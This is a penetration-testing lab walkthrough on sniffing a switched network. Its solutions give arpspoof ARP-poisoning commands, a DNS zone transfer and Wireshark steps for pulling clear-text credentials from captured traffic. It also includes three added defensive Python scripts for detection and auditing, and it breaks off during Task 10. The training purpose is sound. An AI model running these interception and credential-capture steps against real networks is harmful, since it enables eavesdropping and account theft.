1. LAB SNIFFING LAB ID: 10



HERA LAB ID: 10 - SNIFFING

Topics covered:
- Sniffing in a switched network
- ARP Poisoning
- Analyzing network traffic
- Extracting files from a network trace
- Stealing credentials
- Mapping/exploring network resources

1. LAB

You are a Penetration Tester and you're asked to determine if a very sensitive network segment is secure. The client, named Sportsfoo.com, is a small research company specialized in sports, so all data from a specific segment should only be available to the authorized users and should not be exposed to anybody else. The scope provided by the client is any host/device on the 172.16.5.0/24 network.

The following image represents the LAB environment:
[Figure: lab environment. Network 172.16.5.0; PENTESTER at 172.16.5.x]

elearnsecurity s.r.l. 2012 HERA

2. GOALS

- Map the network
- Sniff the traffic
- Review the network traffic
- List your findings
- See what you can do with the credentials discovered
- Bonus: Provide a list of countermeasures to your client

3. WHAT YOU WILL LEARN

- How to map a network
- How to sniff in a switched network
- ARP Poisoning attack
- Review FTP and HTTP packets
- Obtain files transferred via SMB
- How to use the sensitive information obtained from the network trace in order to expand your access to the network

To guide you during the lab you will find different Tasks. Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal. They are not meant to be used as a methodology.

Armed with the skills acquired through the Tasks you can achieve the Lab goal. If this is the first time you do this lab, we advise you to follow these Tasks. Once you have completed all the Tasks, you can proceed to the end of this paper and check the solutions.

4. RECOMMENDED TOOLS

- netdiscover
- nmap
- arpspoof
- driftnet
- Wireshark
- Metasploit / PSEXEC
- SMBmount

5. IMPORTANT NOTE

Further information: Lab machines (like the web server and internal organization machines) are not connected to the internet. In order to connect to the target organization website you have to insert the following line in your hosts file:

10.10.10.10 intranet.sportsfoo.com

hosts file path:
Windows: C:\Windows\System32\drivers\etc\hosts
Linux: /etc/hosts

1. TASKS

Task 1: Host Discovery Using ARP requests

Using only ARP packets, please list all online hosts of the network 172.16.5.0/24.

MAC Address / Host IP address:

Please, list another way (another tool and its parameters) you could use to get the same information (still using only ARP packets):

Task 2: Host Discovery Using DNS

Task 2.1: Determine the DNS Server

Perform a port scan on all of the hosts above in order to identify which one is running the DNS service. Be very specific, so make sure you will only check for the DNS port. Also, using the same command line, determine if the DNS server is running Linux, BSD, or Windows.

DNS Server IP Address:

Task 2.2: Determine the domain name

Using any DNS lookup tool, please determine for what domain name this DNS server is authoritative.

Domain Name:

Task 2.3: List additional hosts using DNS zone transfer

Once you know the domain name and the DNS server address, please check if you are able to identify new hosts using a DNS zone transfer.

New Hosts:

Can you tell why the hosts above were not found using ARP requests?

Task 3: Identify the default gateway for the 172.16.5.0/24 network

According to all the tasks above, you have been able to identify two different networks. Now we need to identify the default gateway that is handling the communication between these networks. How can you do that?

Task 4: Draw a network map

Let's draw a network map in order to graphically represent the environment that we have discovered so far.

Task 5: Sniff packets between the hosts 172.16.5.5 and 172.16.5.1

Sniff all packets sent/received between the hosts 172.16.5.5 and 172.16.5.1. Keep sniffing this target for 5 minutes. Save the network trace as /root/task5.pcap. Make sure you are able to see all images while you are sniffing.

Task 6: Sniff packets between the hosts 172.16.5.6 and 172.16.5.1

Sniff all packets sent/received between the hosts 172.16.5.6 and 172.16.5.1. Keep sniffing this target for 5 minutes. Save the network trace as /root/task6.pcap.

Task 7: Sniff packets between the hosts 172.16.5.6 and 172.16.5.10

Sniff all packets sent/received between the hosts 172.16.5.6 and 172.16.5.10. Keep sniffing this target for 5 minutes. Save the network trace as /root/task7.pcap.

Task 8: Analyze the file /root/task5.pcap

Task 8.1: Understand the big picture of the network traffic

Before diving into every single packet of the network trace, first try to get a big picture of what was obtained. Identify the most used protocols.

HTTP Percentage:
FTP Percentage:

Task 8.2: Analyze the HTTP traffic, Part 1

Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure your filter doesn't show any packet originated from or destined to your (attacker) machine. The HTTP protocol consists of a couple of different commands (full details are available in RFC 2616).

Task 8.3: Analyze the HTTP traffic, Part 2

Remember that we were hired to determine if that network segment is secure, so analyze all of the packets and determine which ones are secure.

Task 8.4: Analyze the HTTP traffic, Part 3

Find at least 2 HTTP requests which are not secure, but don't seem to contain confidential information.

Task 8.5: Analyze the HTTP traffic, Part 4

Find at least 2 HTTP requests that are really insecure and expose your client to big problems like identity theft, privilege escalation, etc.

Task 8.6: Analyze the FTP traffic, Part 1

Create a filter in Wireshark to show only the FTP traffic.

Task 8.7: Analyze the FTP traffic, Part 2

List the FTP commands issued by the host 172.16.5.5.

Task 8.8: Analyze the FTP traffic, Part 3

What is the username and password used during that FTP connection?

Task 9: Analyze the file /root/task6.pcap

Task 9.1: Determine the username and password in use for the website http://intranet.sportsfoo.com

Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host 172.16.5.6 when accessing http://intranet.sportsfoo.com.

Username:
Password:

Task 9.2: Recover all of the files downloaded by the user above

By reviewing all of the HTTP GET requests, describe all of the files that were retrieved by the user above.

Task 10: Analyze the file /root/task7.pcap

Review the network trace obtained in Task 7. Identify two files which were transferred via SMB and their contents.

Filename:
Contents:

Task 11: Use the credentials gathered in order to see what access you can get on the host 172.16.5.10

With two different credentials in hand, check if you can access the following resources:

\\172.16.5.10\finance - Credential:
\\172.16.5.10\technology - Credential:
Remote shell on 172.16.5.10 - Credential:

Task 12: Countermeasures

List at least one countermeasure that your client could implement for some of the problems identified during the test.

1. What protocol can be used on http://intranet.sportsfoo.com in order to avoid credentials being transmitted in clear-text?

2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com?
3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN is encrypted?
4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks?

Solutions

Task 1: Host Discovery Using ARP requests

Answer:
netdiscover -i tap0 -r 172.16.5.0/24

Explanation: The netdiscover command works by sending ARP requests to the broadcast address asking for a specific IP address range (if specified). ARP (Address Resolution Protocol) is a protocol used for resolution of network layer addresses (IP addresses) into link layer addresses (MAC addresses). ARP works on layer 2 of the OSI model, so it can only be used to discover hosts which are located in the same subnet. As you can see on the screenshot below, many ARP packets were sent to the broadcast address (ff:ff:ff:ff:ff:ff); however, ARP replies were only obtained from the hosts which are live: 172.16.5.1, 172.16.5.5, 172.16.5.6, and 172.16.5.10.

[Screenshot: netdiscover output and the ARP requests/replies in Wireshark]

MAC Address         Host IP address
00:50:56:b1:04:bc   172.16.5.1
00:50:56:b1:05:b6   172.16.5.5
00:50:56:b1:05:b9   172.16.5.6
00:50:56:b1:05:ba   172.16.5.10

Please, list another way (another tool and its parameters) you could use to do host discovery using only ARP requests:

Answer:
nmap -PR -sn 172.16.5.1-255

Task 2: Host Discovery Using DNS

Task 2.1: Determine the DNS Server

Answer:
nmap -sT -v -p53 172.16.5.1 172.16.5.5 172.16.5.6 172.16.5.10

Explanation: As we already have a list of hosts found, now we need to query each one of these hosts in order to identify which is running the DNS service. The DNS port is TCP/53 (for zone transfers) and UDP/53 (for DNS queries); all we need to do is check if TCP port 53 is open on all of the hosts that we know are online. The command above tells nmap to use a TCP connect scan (-sT) against port 53 (-p53) on the hosts 172.16.5.1, 172.16.5.5, 172.16.5.6, and 172.16.5.10. As shown in the screenshot below, nmap sent four SYN packets, targeting port 53 of all of these hosts. According to the TCP 3-way handshake, the hosts which are listening on that port should answer with a SYN,ACK packet. The hosts which don't have port 53 open should answer with a RST,ACK packet. As we can see on the screenshot, the only host which replied with a SYN,ACK packet is 172.16.5.10, while the host 172.16.5.6 replied with a RST,ACK packet, which means that port is closed. The hosts 172.16.5.1 and 172.16.5.5 have not responded with any packet, which means that likely a firewall (or another packet filtering mechanism) is in place.

[Screenshot: nmap SYN packets to port 53 and the replies in Wireshark]

DNS Server IP Address: 172.16.5.10

Task 2.2: Determine the domain name

Answer: sportsfoo.com

Explanation: Once we already know a couple of hosts of our client and also which is the DNS server for that network, our next step is to identify the network domain name. We can do that by using reverse lookups with nslookup or dig.

nslookup
(here we are launching the nslookup utility)
> server 172.16.5.10
(here we are telling the tool to use a specific DNS server. By default nslookup uses the DNS servers specified in the file /etc/resolv.conf)
Default server: 172.16.5.10
Address: 172.16.5.10#53
> 172.16.5.5
(here we are asking the DNS server to tell us what is the FQDN - fully qualified domain name - for the host 172.16.5.5. We could use any known IP address)
Server: 172.16.5.10
Address: 172.16.5.10#53
5.5.16.172.in-addr.arpa name = wkst-techsupport.sportsfoo.com.

You could also use dig for the task above. The following command line would do all of the work above:
dig @172.16.5.10 -x 172.16.5.5

Task 2.3: List additional hosts using DNS zone transfer

Answer:
dig @172.16.5.10 sportsfoo.com -t AXFR

Explanation: Zone transfers are usually misconfigurations of a DNS server. They should be enabled, if required, only for trusted IP addresses (usually trusted downstream name servers). When zone transfers are open to anyone, we can enumerate the whole DNS record set for that zone. There are a couple of different tools that are able to do that; however, we will focus on dig. The command dig @172.16.5.10 sportsfoo.com -t AXFR asks the DNS server 172.16.5.10 to list all of its records (full zone transfer, -t AXFR) for the domain named sportsfoo.com. The full command and its results are listed below. Note that we were able to discover two new hosts: 10.10.10.6 and 10.10.10.10.

dig @172.16.5.10 sportsfoo.com -t AXFR

; <<>> DiG 9.7.0-P1 <<>> @172.16.5.10 sportsfoo.com -t AXFR
; (1 server found)
;; global options: +cmd
sportsfoo.com. 3600 IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com. 19 900 600 86400 3600
sportsfoo.com. 3600 IN NS els-winser2003.sportsfoo.com.
sportsfoo.com. 3600 IN NS els-winser2003.sports.com.
els-winser2003.sportsfoo.com. 3600 IN A 172.16.5.10
ftp.sportsfoo.com. 3600 IN A 10.10.10.6
intranet.sportsfoo.com. 3600 IN A 10.10.10.10
wkst-finance.sportsfoo.com. 3600 IN A 172.16.5.6
wkst-techsupport.sportsfoo.com. 3600 IN A 172.16.5.5
sportsfoo.com. 3600 IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com. 19 900 600 86400 3600
;; Query time: 411 msec
;; SERVER: 172.16.5.10#53(172.16.5.10)
;; WHEN: Sun Nov 18 03:19:16 2012
;; XFR size: 9 records (messages 9, bytes 609)

The new hosts found belong to a different network (10.10.10.x). As the penetration tester's laptop is placed in the network 172.16.5.0/24 and all of the host discovery performed so far was done using only ARP packets, we understand that we were unable to find these hosts before because ARP packets can only be sent to machines in the same broadcast domain, so ARP discovery only works for hosts in the same subnet.
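The reasoning above (ARP only finds hosts in the local broadcast domain, so the zone transfer reveals hosts a layer-2 sweep cannot) can be checked mechanically. The following Python script is an added example, not part of the lab or its solutions: it parses the A records from the dig answer pasted above, splits them by whether they fall inside the pentester's 172.16.5.0/24 subnet, and reconciles the local ones with the ARP sweep results from Task 1. The dig text and the ARP host list are taken from this page; the function names and the reconciliation logic are my own.

```python
import ipaddress
import re

# Constructed sample: the answer section of the zone transfer shown on this
# page (dig @172.16.5.10 sportsfoo.com -t AXFR), pasted as plain text.
AXFR_OUTPUT = """\
sportsfoo.com. 3600 IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com. 19 900 600 86400 3600
sportsfoo.com. 3600 IN NS els-winser2003.sportsfoo.com.
els-winser2003.sportsfoo.com. 3600 IN A 172.16.5.10
ftp.sportsfoo.com. 3600 IN A 10.10.10.6
intranet.sportsfoo.com. 3600 IN A 10.10.10.10
wkst-finance.sportsfoo.com. 3600 IN A 172.16.5.6
wkst-techsupport.sportsfoo.com. 3600 IN A 172.16.5.5
;; Query time: 411 msec
"""

# Hosts that answered the ARP sweep in Task 1 (from the netdiscover table).
ARP_HOSTS = {"172.16.5.1", "172.16.5.5", "172.16.5.6", "172.16.5.10"}

# owner  TTL  IN  A  address   (dig prints one record per line, space separated)
A_RECORD = re.compile(r"^(\S+)\s+\d+\s+IN\s+A\s+(\d+\.\d+\.\d+\.\d+)$")


def parse_a_records(text):
    """Return {hostname: IPv4Address} for every A record in dig output.

    Comment lines (';'), SOA/NS records and blank lines are skipped, and the
    trailing dot of the owner name is removed.
    """
    records = {}
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            records[m.group(1).rstrip(".")] = ipaddress.ip_address(m.group(2))
    return records


def split_by_subnet(records, local_subnet):
    """Partition A records into hosts inside local_subnet and hosts outside it.

    Only the first group can be found with ARP, which never crosses a router.
    """
    net = ipaddress.ip_network(local_subnet)
    local = {name: str(ip) for name, ip in records.items() if ip in net}
    remote = {name: str(ip) for name, ip in records.items() if ip not in net}
    return local, remote


def reconcile_with_arp(records, arp_hosts, local_subnet):
    """Compare the zone against the ARP sweep.

    Returns two sorted lists: local addresses present in DNS that did not
    answer ARP (stale records or hosts that were down), and ARP responders
    with no A record (unregistered devices, such as the gateway here).
    """
    local, _ = split_by_subnet(records, local_subnet)
    dns_addrs = set(local.values())
    dns_only = sorted(dns_addrs - set(arp_hosts), key=ipaddress.ip_address)
    arp_only = sorted(set(arp_hosts) - dns_addrs, key=ipaddress.ip_address)
    return dns_only, arp_only


if __name__ == "__main__":
    recs = parse_a_records(AXFR_OUTPUT)
    local, remote = split_by_subnet(recs, "172.16.5.0/24")
    print("reachable by ARP:", local)
    print("behind the gateway:", remote)
    print("in DNS but not ARP / in ARP but not DNS:",
          reconcile_with_arp(recs, ARP_HOSTS, "172.16.5.0/24"))
```

Run against the page's data, the script lists ftp.sportsfoo.com and intranet.sportsfoo.com as the hosts behind the gateway, and reports 172.16.5.1 as the one ARP responder with no A record, which is exactly the gateway identified in Task 3.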

Task 3: Identify the default gateway for the 172.16.5.0/24 network

Answer: The default gateway is 172.16.5.1

Explanation: One of the methods that could be used to identify the default gateway of a network is to track the path packets take from an IP network on their way to a given host. The traceroute command does exactly that; however, in this case it looks like the default gateway is blocking ICMP packets, so traceroute is not going to help here. Another way to try to identify the default gateway is to evaluate the already existing routes in your system. You can do that by running the route command. As you can see below, whenever the penetration tester needs to communicate with the network 10.10.10.0, it's going to use the gateway 172.16.5.1.

[Screenshot: output of the route command]

Note: In order to be able to sniff packets properly using arpspoof, you will need to use the same default gateway as the one in use by your target.

Task 4: Draw a network map

This is a possible graphic representation after compiling all information gathered so far:

[Figure: network map]
Network 172.16.5.0:
  172.16.5.5    wkst-techsupport.sportsfoo.com
  172.16.5.6    wkst-finance.sportsfoo.com
  172.16.5.10   els-winser2003.sportsfoo.com (DNS Server)
  172.16.5.x    PENTESTER
  172.16.5.1    Default Gateway
Network 10.10.10:
  10.10.10.6    ftp.sportsfoo.com
  10.10.10.10   intranet.sportsfoo.com

Task 5: Sniff packets between the hosts 172.16.5.5 and 172.16.5.1

In order to sniff all packets between the hosts 172.16.5.5 and 172.16.5.1 we can follow the instructions below:

1-) Prepare to collect all of the network traffic sent to/from your target:
1.1-) Launch Wireshark (if you are using BackTrack, click Applications, Forensics, Network Forensics, Wireshark).
1.2-) Select the network interface on which you intend to grab network traffic (click Capture, Interfaces, check tap0, and then click Start).

2-) Enable IP forwarding in your system. To do this, run the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets. We will need to tell the IP address 172.16.5.5 that every time it needs to communicate with the IP address 172.16.5.1, it should forward the request to the PENTESTER system, and vice-versa. It can be done with the following commands (we will need two different terminal windows to run these commands):

arpspoof -i tap0 -t 172.16.5.5 172.16.5.1
arpspoof -i tap0 -t 172.16.5.1 172.16.5.5

The commands above will keep sending ARP packets in order to trick the ARP tables of both hosts. They set the ARP table in a malicious way so that whenever the host 172.16.5.5 needs to communicate with 172.16.5.1, instead of going to the MAC address of the host 172.16.5.1, the traffic will go to the MAC address of our system (penetration tester). In order to illustrate this attack, consider the following ARP cache table displayed on the system 172.16.5.5 before launching the attack:

[Screenshot: ARP cache of 172.16.5.5 before the attack]

Now, see the same ARP cache table after launching our attack:

[Screenshot: ARP cache of 172.16.5.5 after the attack, with the gateway IP bound to the pentester's MAC]

4-) Launch driftnet in order to see if there are any images in the traffic between these hosts, so you might have a clue about what they are doing. To do that, run the following command:

driftnet -i tap0

You might be able to see some images like:

[Screenshot: images captured by driftnet]

5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (Ctrl+C) or close the arpspoof commands that might still be running. Save the network capture as /root/task5.pcap so we can review it later.
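The before/after ARP cache change illustrated in step 3 is also what a network monitor looks for when detecting this attack, which is the subject of countermeasure question 4 in Task 12. The following Python script is an added example, not part of the lab or its solutions: it replays a constructed sequence of ARP replies (the two legitimate bindings come from the netdiscover table in Task 1; the pentester's MAC is a placeholder, since the page never shows it) and raises an alert when an IP changes MAC or when one MAC claims several IPs, and separately checks every reply against a known-good table. The function names and the baseline dictionary are my own.

```python
from collections import defaultdict

# The pentester's MAC address is not shown anywhere on this page: placeholder.
PENTESTER_MAC = "00:50:56:b1:0a:aa"

# Constructed sequence of ARP replies as seen on the wire: (sender IP, sender MAC).
ARP_REPLIES = [
    ("172.16.5.1", "00:50:56:b1:04:bc"),   # legitimate gateway reply (Task 1 table)
    ("172.16.5.5", "00:50:56:b1:05:b6"),   # legitimate workstation reply (Task 1 table)
    ("172.16.5.1", PENTESTER_MAC),         # forged: "172.16.5.1 is at <pentester>"
    ("172.16.5.5", PENTESTER_MAC),         # forged: "172.16.5.5 is at <pentester>"
    ("172.16.5.1", PENTESTER_MAC),         # arpspoof repeats the same reply
]

# Known-good bindings, e.g. recorded from the netdiscover sweep before the test.
BASELINE = {
    "172.16.5.1": "00:50:56:b1:04:bc",
    "172.16.5.5": "00:50:56:b1:05:b6",
    "172.16.5.6": "00:50:56:b1:05:b9",
    "172.16.5.10": "00:50:56:b1:05:ba",
}


def detect_arp_conflicts(replies):
    """Replay ARP replies and return a list of alert strings.

    Two indicators of poisoning are reported:
      * an IP that was bound to one MAC now shows up with another
        (the ARP cache change shown in the screenshots above)
      * one MAC claiming more than one IP (the poisoner answers for both
        ends of the conversation it sits in the middle of)
    Each distinct (ip, mac) pair is reported once; repeated replies are ignored.
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        seen = ip_to_macs[ip]
        if mac in seen:
            continue                       # binding already known, nothing new
        if seen:                           # IP previously bound to another MAC
            alerts.append(f"MAC change for {ip}: {sorted(seen)} -> {mac}")
        seen.add(mac)
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"MAC {mac} claims several IPs: {sorted(mac_to_ips[mac])}")
    return alerts


def check_against_baseline(replies, baseline):
    """Return the sorted list of (ip, mac) bindings that contradict a known-good
    table; this is the comparison a static-ARP or arpwatch-style monitor makes."""
    bad = set()
    for ip, mac in replies:
        mac = mac.lower()
        expected = baseline.get(ip)
        if expected is not None and expected.lower() != mac:
            bad.add((ip, mac))
    return sorted(bad)


if __name__ == "__main__":
    for alert in detect_arp_conflicts(ARP_REPLIES):
        print("ALERT:", alert)
    print("bindings contradicting baseline:",
          check_against_baseline(ARP_REPLIES, BASELINE))
```

With the sample above the first two replies produce no alert; the third and fourth each trigger a MAC change alert, and the fourth also reveals one MAC answering for two IPs. The baseline check is the more robust of the two in practice, because a poisoner that starts before the monitor never produces a "change" at all.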

Task 6: Sniff packets between the hosts 172.16.5.6 and 172.16.5.1

We will need to repeat the same technique used in Task 5, so let's summarize what we will need to do:

1-) Start Wireshark and start a new capture by selecting the proper network interface, tap0.

2-) Check if IP forwarding is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If it's 1, it means that it's already enabled. If it's disabled, make sure that you enable it by running the command:
echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets by changing their ARP cache tables. For that, we will need to open two different terminal windows and run the following commands:
arpspoof -i tap0 -t 172.16.5.6 172.16.5.1
arpspoof -i tap0 -t 172.16.5.1 172.16.5.6

4-) Launch driftnet so you can have an understanding of what is happening between these hosts. To do that, run the following command:
driftnet -i tap0

You might be able to see some images like:

[Screenshot: images captured by driftnet]

5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (Ctrl+C) or close the arpspoof commands that might still be running. Save the network capture as /root/task6.pcap so we can review it later.

Task 7: Sniff packets between the hosts 172.16.5.6 and 172.16.5.10

We will need to repeat the same techniques used in Tasks 5 and 6, so:

1-) Start Wireshark and start a new capture by selecting the network interface tap0.

2-) Check if IP forwarding is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If it's 1, it means that it's already enabled. So if it's disabled, make sure that you enable it by running the command:
echo 1 > /proc/sys/net/ipv4/ip_forward

3-) Now we will need to trick our targets by changing their ARP cache tables. For that, we will need to open two different terminal windows and run the following commands:
arpspoof -i tap0 -t 172.16.5.6 172.16.5.10
arpspoof -i tap0 -t 172.16.5.10 172.16.5.6

4-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (Ctrl+C) or close the arpspoof commands that might still be running. Save the network capture as /root/task7.pcap so we can review it later.

Task 8: Analyze the file /root/task5.pcap

Task 8.1: Understand the big picture of the network traffic gathered

Before diving into every packet of the network trace, first try to understand the type of traffic that was obtained. We can do that by opening the file /root/task5.pcap in Wireshark and then clicking Statistics, Protocol Hierarchy.

[Screenshot: Wireshark Protocol Hierarchy for task5.pcap]

According to the screenshot above, we can see that of all the traffic obtained, we got 2.02% FTP traffic, 4.19% HTTP traffic, and 5.63% SSL traffic.

Task 8.2: Analyze the HTTP traffic, Part 1

Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure that you only see the network traffic sent and received by your target (172.16.5.5). You can do that by inserting the following string in the filter field as highlighted below:

http and ip.addr == 172.16.5.5

[Screenshot: the filter applied in Wireshark]

Task 8.3: Analyze the HTTP traffic, Part 2

After analyzing the HTTP traffic we were able to understand that it's a protocol which basically consists of a bunch of requests and responses. Also, all traffic transmitted in HTTP is transmitted in clear-text.

SSL is the protocol which implements security for the HTTP protocol. When you use SSL, your strings are not transmitted in clear-text, so even if someone is able to capture your traffic, they will have a hard time trying to decrypt it in order to understand what's going on. So, in order to determine which packets sent/received by the host 172.16.5.5 are secure, all we need to do is create a filter for SSL packets:

[Screenshot: SSL filter applied to the traffic of 172.16.5.5]

Task 8.4: Analyze the HTTP traffic, Part 3

One of the main commands used in the HTTP protocol is the HTTP GET request. HTTP GET requests are usually used when you want to retrieve a file from a web server. In the screenshot below, we can see that the user has browsed to the file casillas.png on the http://intranet.sportsfoo.com website. You can see the HTTP GET request (in red) and also the HTTP response from the server (in blue):

[Screenshot: Follow TCP Stream of the GET request for casillas.png]

So while the information is being transmitted in clear-text on the network, the mere fact that the user is browsing to that website and downloading a couple of files is likely not a big deal. We can see other HTTP GET requests issued by the user by creating the following filter in Wireshark:

http.request.method == GET

[Screenshot: HTTP GET requests listed in Wireshark]

Task 8.5: Analyze the HTTP traffic, Part 4

The HTTP POST request is usually used when a user wants to submit information to the web server (like filling in a form). So it's definitely something that we want to check in order to see if critical information is being transmitted in clear-text. We can do that by creating the following filter in Wireshark:

http.request.method == POST

As you can see on the screenshot below, there are a couple of POST requests with a very interesting name: POST /checklogin.php. Let's take a closer look at one of these requests by selecting one of these packets, right-clicking on it, and then selecting Follow TCP Stream:

[Screenshot: Follow TCP Stream of a POST /checklogin.php request]

According to the screenshot above, we are able to see an attempt to log in to the http://intranet.sportsfoo.com website by submitting the username gfreitas and the password Silv@n@. However, it looks like it failed, because the server answered with an HTTP 302 code which redirects the user to a page named notheremyfriend.php. Even if this credential is not valid for this website, an attacker might want to use that credential when attacking other resources.

On the same screen (Follow TCP Stream), click the button named Filter Out This Stream, so Wireshark will temporarily exclude this request from the remaining packets and you can continue your analysis. You will have to repeat the procedure above until you find a valid credential. According to the example below we were able to obtain a valid credential. While the password et1@sr7! used by the user admin is a strong one, it doesn't help since it is being transmitted in clear-text.

[Screenshot: Follow TCP Stream of the successful POST /checklogin.php request]

Note: You can try to validate this credential by trying to log in to the http://intranet.sportsfoo.com website.
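The rule used here and again in Task 9.1 (a 302 to notheremyfriend.php means the login failed, a 302 to login_success.php means it worked) is the kind of check an analyst automates when auditing a capture for clear-text credentials. The following Python script is an added example, not part of the lab or its solutions: it takes reassembled request/response pairs as text, constructed here to mirror the checklogin.php exchanges described on this page, flags every POST /checklogin.php whose form carries a secret field over plain HTTP, and classifies the outcome from the Location header. The form field names username and password are an assumption (the page shows the values, not the names), and the findings report only field names, never the secret values.

```python
from urllib.parse import parse_qs

# Constructed sample streams (request text, response text), modelled on the
# POST /checklogin.php exchanges in Tasks 8.5 and 9.1. Field names "username"
# and "password" are assumed; the page shows only the submitted values.
SAMPLE_STREAMS = [
    (
        "POST /checklogin.php HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "username=gfreitas&password=Silv%40n%40",
        "HTTP/1.1 302 Found\r\nLocation: notheremyfriend.php\r\n\r\n",
    ),
    (
        "POST /checklogin.php HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "username=admin&password=et1%40sr7!",
        "HTTP/1.1 302 Found\r\nLocation: login_success.php\r\n\r\n",
    ),
    (
        "POST /checklogin.php HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "username=almir&password=Corinthians2012",
        "HTTP/1.1 302 Found\r\nLocation: login_success.php\r\n\r\n",
    ),
    (   # a plain file download (Task 8.4): not a login, must be ignored
        "GET /casillas.png HTTP/1.1\r\nHost: intranet.sportsfoo.com\r\n\r\n",
        "HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n<png bytes omitted>",
    ),
]

LOGIN_PATH = "/checklogin.php"
SUCCESS_PAGE = "login_success.php"
FAILURE_PAGE = "notheremyfriend.php"


def parse_http_message(raw):
    """Split one HTTP message into (start line, {lower-cased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify_login(request_raw, response_raw, secret_fields=("password",)):
    """Return a finding dict for a POST to the login page, or None otherwise.

    The outcome is derived from the redirect target the server sends back,
    which is the same signal the http.location filter in Task 9.1 uses.
    """
    start, req_headers, body = parse_http_message(request_raw)
    method, path, _ = start.split(" ", 2)
    if method != "POST" or path != LOGIN_PATH:
        return None
    form = {k: v[0] for k, v in parse_qs(body).items()}
    status_line, resp_headers, _ = parse_http_message(response_raw)
    status = int(status_line.split(" ")[1])
    location = resp_headers.get("location", "")
    if status == 302 and location.endswith(SUCCESS_PAGE):
        outcome = "success"
    elif status == 302 and location.endswith(FAILURE_PAGE):
        outcome = "failure"
    else:
        outcome = "unknown"
    return {
        "host": req_headers.get("host", ""),
        "username": form.get("username", ""),
        # names of secret fields sent in clear-text; values deliberately omitted
        "cleartext_secret_fields": sorted(f for f in secret_fields if f in form),
        "status": status,
        "location": location,
        "outcome": outcome,
    }


def audit_streams(streams):
    """Run classify_login over every stream and collect the login findings."""
    findings = []
    for req, resp in streams:
        result = classify_login(req, resp)
        if result is not None:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in audit_streams(SAMPLE_STREAMS):
        print(f"{f['username']:<10} {f['outcome']:<8} -> {f['location']} "
              f"(clear-text fields: {', '.join(f['cleartext_secret_fields'])})")
```

For a real capture, the request/response text for each stream is what Wireshark's Follow TCP Stream shows; the classification logic stays the same, and every row with a non-empty cleartext_secret_fields list is a finding for the client regardless of whether the login succeeded.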

Task 8.6: Analyze the FTP traffic, Part 1

Create a filter in Wireshark to show only the FTP traffic. It's pretty simple: just type ftp in the Filter field and hit <Enter> or click the Apply button.

[Screenshot: ftp filter applied in Wireshark]

Task 8.7: Analyze the FTP traffic, Part 2

List the FTP commands issued by the host 172.16.5.5. We can do that by selecting the first packet, right-clicking on it, and selecting Follow TCP Stream:

[Screenshot: Follow TCP Stream of the FTP control connection]

All of the commands issued by the user are in red and all of the server responses are in blue.

Task 8.8: Analyze the FTP traffic, Part 3

What is the username and password used during that FTP connection? According to the screenshot above, the username is admin and the password is et1@sr7!

Task 9: Analyze the file /root/task6.pcap

Task 9.1: Determine the username and password in use for the website http://intranet.sportsfoo.com

Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host 172.16.5.6 when accessing http://intranet.sportsfoo.com. According to the second screenshot of Task 8.7, we already understand that when a user is able to log in successfully they will get an HTTP 302 response which redirects them to the page named login_success.php. If the authentication fails, they will also get an HTTP 302 response; however, the user will be redirected to the page named notheremyfriend.php. With that in mind, instead of going through every single HTTP stream we can just create and apply a filter that will show only the packets of our interest:

http.location == login_success.php

Then, right-click on any of these packets and select Follow TCP Stream:

[Screenshot: Follow TCP Stream of the successful login]

According to the screenshot above, we were able to identify one more working credential:
Username: almir
Password: Corinthians2012

Task 9.2: Recover all of the files downloaded by the user above

Use the following steps in order to recover (retrieve) all of the files downloaded by the user:

1-) Launch Wireshark and then open the following file: /root/task6.pcap
2-) Click File, Open, Export Objects, HTTP

Select one or more files and save them to a folder of your preference.

[Screenshot: Wireshark Export HTTP object list]

According to the screenshot below, we were able to retrieve the files successfully:

[Screenshot: the retrieved files]

Task 10: Analyze the file /root/task7.pcap

Review the network trace obtained in Task 7. Identify two files which were transferred via SMB and their contents.

1-) Launch Wireshark and open the file /root/task7.pcap
2-) Click Statistics, Protocol Hierarchy in order to get an understanding of the type of traffic that we will need to deal with.

[Screenshot: Wireshark Protocol Hierarchy for task7.pcap]

3-) According to the screenshot above, it looks like a significant amount of traffic was transmitted via SMB. So let's create a filter in Wireshark so we can only see traffic related to this protocol. We just need to type smb in the filter field and then click Apply.
4-) We can get a clue whether any files were transmitted via SMB by applying a filter with the following string: smb.file
5-) According to the screenshot above, it looks like there are some interesting files being transmitted via SMB. We can try to retrieve those files using the following steps:
5.1-) Click File, Export Objects, SMB.
